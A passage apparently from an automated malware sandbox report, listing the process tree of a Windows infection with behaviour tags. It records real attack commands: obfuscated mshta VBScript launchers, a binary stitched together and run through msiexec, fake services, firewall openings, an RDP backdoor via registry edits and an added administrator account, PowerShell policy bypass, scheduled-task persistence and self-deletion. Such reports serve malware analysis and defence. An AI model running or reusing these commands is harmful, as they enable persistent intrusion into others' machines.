"C:\Users\Admin\Pictures\Adobe Films\FZzLr2tjqX1Jir6RqytEFraR.exe"
4⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:4516

C:\Users\Admin\Pictures\Adobe Films\yJF_LsprLnKYzCsvUDnA8T0K.exe
"C:\Users\Admin\Pictures\Adobe Films\yJF_LsprLnKYzCsvUDnA8T0K.exe"
4⤵
- Executes dropped EXE
- Loads dropped DLL
PID:4436

C:\Users\Admin\AppData\Roaming\Calculator\setup.exe
C:\Users\Admin\AppData\Roaming\Calculator\setup.exe -cid= -sid= -silent=1
5⤵
- Executes dropped EXE
- Loads dropped DLL
- Adds Run key to start application
PID:2032

C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" "--XpjC5"
6⤵
- Executes dropped EXE
- Loads dropped DLL
PID:5720

C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --monitor-self --monitor-self-argument=--type=crashpad-handler "--monitor-self-argument=--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --monitor-self-argument=/prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x1f8,0x1fc,0x200,0x1d4,0x204,0x7ffbe3fcdec0,0x7ffbe3fcded0,0x7ffbe3fcdee0
7⤵
- Executes dropped EXE
- Loads dropped DLL
PID:6132

C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --no-periodic-tasks --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x14c,0x150,0x154,0x128,0x158,0x7ff653bb9e70,0x7ff653bb9e80,0x7ff653bb9e90
8⤵
- Executes dropped EXE
- Loads dropped DLL
PID:5160

C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1624,13382773653603593319,856650565539337023,131072 --lang=de --service-sandbox-type=network --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5720_335803455" --mojo-platform-channel-handle=1748 /prefetch:8
7⤵
- Executes dropped EXE
PID:4844

C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=gpu-process --field-trial-handle=1624,13382773653603593319,856650565539337023,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5720_335803455" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1676 /prefetch:2
7⤵
- Executes dropped EXE
PID:5464

C:\Users\Admin\Pictures\Adobe Films\KFxXQ6SLpVozsLbeEbJvKcBO.exe
"C:\Users\Admin\Pictures\Adobe Films\KFxXQ6SLpVozsLbeEbJvKcBO.exe"
4⤵
PID:3088

C:\Users\Admin\Pictures\Adobe Films\Xe69stRPhDXfGhprTq2CAk6x.exe
"C:\Users\Admin\Pictures\Adobe Films\Xe69stRPhDXfGhprTq2CAk6x.exe"
4⤵
- Executes dropped EXE
PID:4632

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 4632 -s 1516
5⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Program crash
PID:4976

C:\Windows\SysWOW64\schtasks.exe
schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST
3⤵
- Creates scheduled task(s)
PID:4300

C:\Windows\SysWOW64\schtasks.exe
schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST
3⤵
- Creates scheduled task(s)
PID:4248

C:\Users\Admin\Pictures\Adobe Films\8FsmloAVEPbzDjS_YK8iQVCC.exe
"C:\Users\Admin\Pictures\Adobe Films\8FsmloAVEPbzDjS_YK8iQVCC.exe"
2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:864

C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" VBsCRIPt:cLose( creAteObjecT("WScRipT.SHElL" ). RuN ( "CMd /r CopY /y ""C:\Users\Admin\Pictures\Adobe Films\8FsmloAVEPbzDjS_YK8iQVCC.exe"" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP & If """"== """" for %K iN ( ""C:\Users\Admin\Pictures\Adobe Films\8FsmloAVEPbzDjS_YK8iQVCC.exe"" ) do taskkill -im ""%~NxK"" -F " ,0, trUE ) )
3⤵
- Suspicious use of WriteProcessMemory
PID:2756

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /r CopY /y "C:\Users\Admin\Pictures\Adobe Films\8FsmloAVEPbzDjS_YK8iQVCC.exe" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP &If ""== "" for %K iN ( "C:\Users\Admin\Pictures\Adobe Films\8FsmloAVEPbzDjS_YK8iQVCC.exe" ) do taskkill -im "%~NxK" -F
4⤵
PID:2056

C:\Users\Admin\AppData\Local\Temp\8pWB.eXE
8pWB.eXe /pO_wtib1KE0hzl7U9_CYP
5⤵
- Executes dropped EXE
PID:4360

C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" VBsCRIPt:cLose( creAteObjecT("WScRipT.SHElL" ). RuN ( "CMd /r CopY /y ""C:\Users\Admin\AppData\Local\Temp\8pWB.eXE"" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP & If ""/pO_wtib1KE0hzl7U9_CYP ""== """" for %K iN ( ""C:\Users\Admin\AppData\Local\Temp\8pWB.eXE"" ) do taskkill -im ""%~NxK"" -F " ,0, trUE ) )
6⤵
PID:4516

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /r CopY /y "C:\Users\Admin\AppData\Local\Temp\8pWB.eXE" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP &If "/pO_wtib1KE0hzl7U9_CYP "== "" for %K iN ( "C:\Users\Admin\AppData\Local\Temp\8pWB.eXE" ) do taskkill -im "%~NxK" -F
7⤵
PID:4676

C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" VbScRIpT: close (crEaTEOBject ("WSCRIPt.SheLl" ). rUn ("C:\Windows\system32\cmd.exe /c EcHO | seT /p = ""MZ"" > 1AQCPNL9.1 &CoPy /b /Y 1AqCPnL9.1 +HxU0.m + HR0NM.yl + _AECH.7+ ThBtZ22Y.U +1MRAv8.M + QZ5UW.aQ+ KKAyEq.00 N3V4H8H.sXy & STARt msiexec.exe -y .\N3V4H8H.SXY " ,0 , TruE ) )
6⤵
PID:4476

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c EcHO | seT /p = "MZ" > 1AQCPNL9.1 &CoPy /b /Y 1AqCPnL9.1 +HxU0.m + HR0NM.yl+ _AECH.7+ ThBtZ22Y.U +1MRAv8.M + QZ5UW.aQ+ KKAyEq.00 N3V4H8H.sXy & STARt msiexec.exe -y .\N3V4H8H.SXY
7⤵
PID:4720

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" EcHO "
8⤵
- Suspicious use of AdjustPrivilegeToken
PID:4636

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" seT /p = "MZ" 1>1AQCPNL9.1"
8⤵
PID:4768

C:\Windows\SysWOW64\msiexec.exe
msiexec.exe -y .\N3V4H8H.SXY
8⤵
- Loads dropped DLL
PID:3884

C:\Windows\SysWOW64\taskkill.exe
taskkill -im "8FsmloAVEPbzDjS_YK8iQVCC.exe" -F
5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4624

C:\Users\Admin\Pictures\Adobe Films\Kk7BKQEt0gSMkeq6PwISSEHn.exe
"C:\Users\Admin\Pictures\Adobe Films\Kk7BKQEt0gSMkeq6PwISSEHn.exe"
2⤵
- Executes dropped EXE
- Loads dropped DLL
PID:4800

C:\Users\Admin\AppData\Roaming\Calculator\setup.exe
C:\Users\Admin\AppData\Roaming\Calculator\setup.exe -cid= -sid= -silent=1
3⤵
- Executes dropped EXE
- Loads dropped DLL
- Adds Run key to start application
PID:4500

C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" "--XpjC5"
4⤵
- Executes dropped EXE
- Checks computer location settings
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
PID:5496

C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --monitor-self --monitor-self-argument=--type=crashpad-handler "--monitor-self-argument=--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --monitor-self-argument=/prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x1f4,0x1f8,0x1fc,0x1d0,0x200,0x7ffbe3fcdec0,0x7ffbe3fcded0,0x7ffbe3fcdee0
5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:6076

C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --no-periodic-tasks --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x128,0x12c,0x130,0x104,0x134,0x7ff653bb9e70,0x7ff653bb9e80,0x7ff653bb9e90
6⤵
- Executes dropped EXE
- Loads dropped DLL
PID:6104

C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1696,14852152980587218817,6929074892959931828,131072 --lang=de --service-sandbox-type=network --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5496_536619832" --mojo-platform-channel-handle=1760 /prefetch:8
5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:5416

C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=gpu-process --field-trial-handle=1696,14852152980587218817,6929074892959931828,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5496_536619832" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1712 /prefetch:2
5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1144

C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1696,14852152980587218817,6929074892959931828,131072 --lang=de --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5496_536619832" --mojo-platform-channel-handle=2192 /prefetch:8
5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:5476

C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Calculator\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1696,14852152980587218817,6929074892959931828,131072 --lang=de --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5496_536619832" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --mojo-platform-channel-handle=2580 /prefetch:1
5⤵
- Executes dropped EXE
- Checks computer location settings
- Loads dropped DLL
PID:5512

C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Calculator\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1696,14852152980587218817,6929074892959931828,131072 --lang=de --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5496_536619832" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --mojo-platform-channel-handle=2668 /prefetch:1
5⤵
- Executes dropped EXE
- Checks computer location settings
- Loads dropped DLL
PID:5572

C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=gpu-process --field-trial-handle=1696,14852152980587218817,6929074892959931828,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5496_536619832" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3148 /prefetch:2
5⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Loads dropped DLL
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:5968

C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1696,14852152980587218817,6929074892959931828,131072 --lang=de --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5496_536619832" --mojo-platform-channel-handle=1724 /prefetch:8
5⤵
PID:5956

C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1696,14852152980587218817,6929074892959931828,131072 --lang=de --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5496_536619832" --mojo-platform-channel-handle=3676 /prefetch:8
5⤵
PID:6384

C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1696,14852152980587218817,6929074892959931828,131072 --lang=de --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5496_536619832" --mojo-platform-channel-handle=2796 /prefetch:8
5⤵
PID:6656

C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1696,14852152980587218817,6929074892959931828,131072 --lang=de --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5496_536619832" --mojo-platform-channel-handle=1680 /prefetch:8
5⤵
PID:6960

C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1696,14852152980587218817,6929074892959931828,131072 --lang=de --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5496_536619832" --mojo-platform-channel-handle=1020 /prefetch:8
5⤵
PID:1608

C:\Users\Admin\AppData\Local\Temp\814D.exe
C:\Users\Admin\AppData\Local\Temp\814D.exe
1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:196

C:\Users\Admin\AppData\Local\Temp\814D.exe
C:\Users\Admin\AppData\Local\Temp\814D.exe
2⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:4420

C:\Users\Admin\AppData\Local\Temp\A792.exe
C:\Users\Admin\AppData\Local\Temp\A792.exe
1⤵
- Executes dropped EXE
- Adds Run key to start application
PID:2328

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\akxyikbr\
2⤵
PID:1900

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\fkjhxdmb.exe" C:\Windows\SysWOW64\akxyikbr\
2⤵
PID:3116

C:\Windows\SysWOW64\sc.exe
"C:\Windows\System32\sc.exe" create akxyikbr binPath= "C:\Windows\SysWOW64\akxyikbr\fkjhxdmb.exe /d\"C:\Users\Admin\AppData\Local\Temp\A792.exe\"" type= own start= auto DisplayName= "wifi support"
2⤵
PID:4264

C:\Windows\SysWOW64\sc.exe
"C:\Windows\System32\sc.exe" description akxyikbr "wifi internet conection"
2⤵
PID:4160

C:\Windows\SysWOW64\sc.exe
"C:\Windows\System32\sc.exe" start akxyikbr
2⤵
PID:5176

C:\Users\Admin\dihfvbkz.exe
"C:\Users\Admin\dihfvbkz.exe" /d"C:\Users\Admin\AppData\Local\Temp\A792.exe"
2⤵
- Executes dropped EXE
PID:5256

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\tuscfydo.exe" C:\Windows\SysWOW64\akxyikbr\
3⤵
PID:5604

C:\Windows\SysWOW64\sc.exe
"C:\Windows\System32\sc.exe" config akxyikbr binPath= "C:\Windows\SysWOW64\akxyikbr\tuscfydo.exe /d\"C:\Users\Admin\dihfvbkz.exe\""
3⤵
PID:5684

C:\Windows\SysWOW64\sc.exe
"C:\Windows\System32\sc.exe" start akxyikbr
3⤵
PID:5784

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\4867.bat" "
3⤵
PID:5860

C:\Windows\SysWOW64\netsh.exe
"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
3⤵
PID:5852

C:\Windows\SysWOW64\netsh.exe
"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
2⤵
PID:5248

C:\Users\Admin\AppData\Local\Temp\39E.exe
C:\Users\Admin\AppData\Local\Temp\39E.exe
1⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:5148

C:\Users\Admin\AppData\Local\Temp\403B.exe
C:\Users\Admin\AppData\Local\Temp\403B.exe
1⤵
PID:5968

C:\Users\Admin\AppData\Local\Temp\46A4.exe
C:\Users\Admin\AppData\Local\Temp\46A4.exe
1⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:6016

C:\Users\Admin\AppData\Local\Temp\A2EE.exe
C:\Users\Admin\AppData\Local\Temp\A2EE.exe
1⤵
- Executes dropped EXE
- Checks processor information in registry
PID:6276

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im A2EE.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\A2EE.exe" & del C:\ProgramData\*.dll & exit
2⤵
PID:6452

C:\Windows\SysWOW64\taskkill.exe
taskkill /im A2EE.exe /f
3⤵
- Kills process with taskkill
PID:6564

C:\Windows\SysWOW64\timeout.exe
timeout /t 6
3⤵
- Delays execution with timeout.exe
PID:6668

C:\Users\Admin\AppData\Local\Temp\DCEB.exe
C:\Users\Admin\AppData\Local\Temp\DCEB.exe
1⤵
PID:6492

C:\Users\Admin\AppData\Local\Temp\603c0340b4\sqtvvs.exe
"C:\Users\Admin\AppData\Local\Temp\603c0340b4\sqtvvs.exe"
2⤵
- Executes dropped EXE
PID:6620

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\603c0340b4\
3⤵
PID:6804

C:\Windows\SysWOW64\reg.exe
REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\603c0340b4\
4⤵
PID:6924

C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN sqtvvs.exe /TR "C:\Users\Admin\AppData\Local\Temp\603c0340b4\sqtvvs.exe" /F
3⤵
- Creates scheduled task(s)
PID:6824

C:\Users\Admin\AppData\Local\Temp\EE22.exe
C:\Users\Admin\AppData\Local\Temp\EE22.exe
1⤵
PID:6692

C:\Users\Admin\AppData\Local\Temp\190C.exe
C:\Users\Admin\AppData\Local\Temp\190C.exe
1⤵
PID:7028

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'
2⤵
PID:1536

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\0xwz5c4y\0xwz5c4y.cmdline"
3⤵
PID:2840

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESA536.tmp" "c:\Users\Admin\AppData\Local\Temp\0xwz5c4y\CSCA6B98D3F62F847259C5A7533F9473D0.TMP"
4⤵
PID:1200

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
3⤵
PID:6140

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
3⤵
PID:6300

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
3⤵
PID:5444

C:\Windows\system32\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f
3⤵
PID:6404

C:\Windows\system32\reg.exe
"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f
3⤵
- Modifies registry key
PID:4216

C:\Windows\system32\reg.exe
"C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f
3⤵
PID:1696

C:\Windows\system32\net.exe
"C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
3⤵
PID:5924

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
4⤵
PID:4220

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr
3⤵
PID:2256

C:\Windows\system32\cmd.exe
cmd /c net start rdpdr
4⤵
PID:3668

C:\Windows\system32\net.exe
net start rdpdr
5⤵
PID:3680

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 start rdpdr
6⤵
PID:4620

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c cmd /c net start TermService
3⤵
PID:6720

C:\Windows\system32\cmd.exe
cmd /c net start TermService
4⤵
PID:4104

C:\Windows\system32\net.exe
net start TermService
5⤵
PID:4772

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 start TermService
6⤵
PID:6628

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f
3⤵
PID:6692

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f
3⤵
- Loads dropped DLL
PID:4436

C:\Users\Admin\AppData\Local\Temp\39C4.exe
C:\Users\Admin\AppData\Local\Temp\39C4.exe
1⤵
PID:7156

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
2⤵
PID:5692

C:\Users\Admin\AppData\Local\Temp\6666.exe
"C:\Users\Admin\AppData\Local\Temp\6666.exe"
3⤵
PID:6264

C:\Windows\System32\conhost.exe
"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\6666.exe"
4⤵
PID:1872

C:\Windows\System32\cmd.exe
"cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\Admin\AppData\Local\Temp\services64.exe"
5⤵
PID:6288

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\Admin\AppData\Local\Temp\services64.exe"
6⤵
- Creates scheduled task(s)
PID:6232

C:\Windows\System32\cmd.exe
"cmd" cmd /c "C:\Users\Admin\AppData\Local\Temp\services64.exe"
5⤵
PID:4792

C:\Users\Admin\AppData\Local\Temp\services64.exe
C:\Users\Admin\AppData\Local\Temp\services64.exe
6⤵
PID:5468

C:\Windows\System32\conhost.exe
"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\services64.exe"
7⤵
PID:3008

C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
8⤵
PID:2140

C:\Windows\System32\conhost.exe
"C:\Windows\System32\conhost.exe" "/sihost64"
9⤵
PID:6820

C:\Users\Admin\AppData\Local\Temp\services64.exe
"C:\Users\Admin\AppData\Local\Temp\services64.exe"
10⤵
PID:6328

C:\Windows\System32\conhost.exe
"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\services64.exe"
11⤵
PID:4464

C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
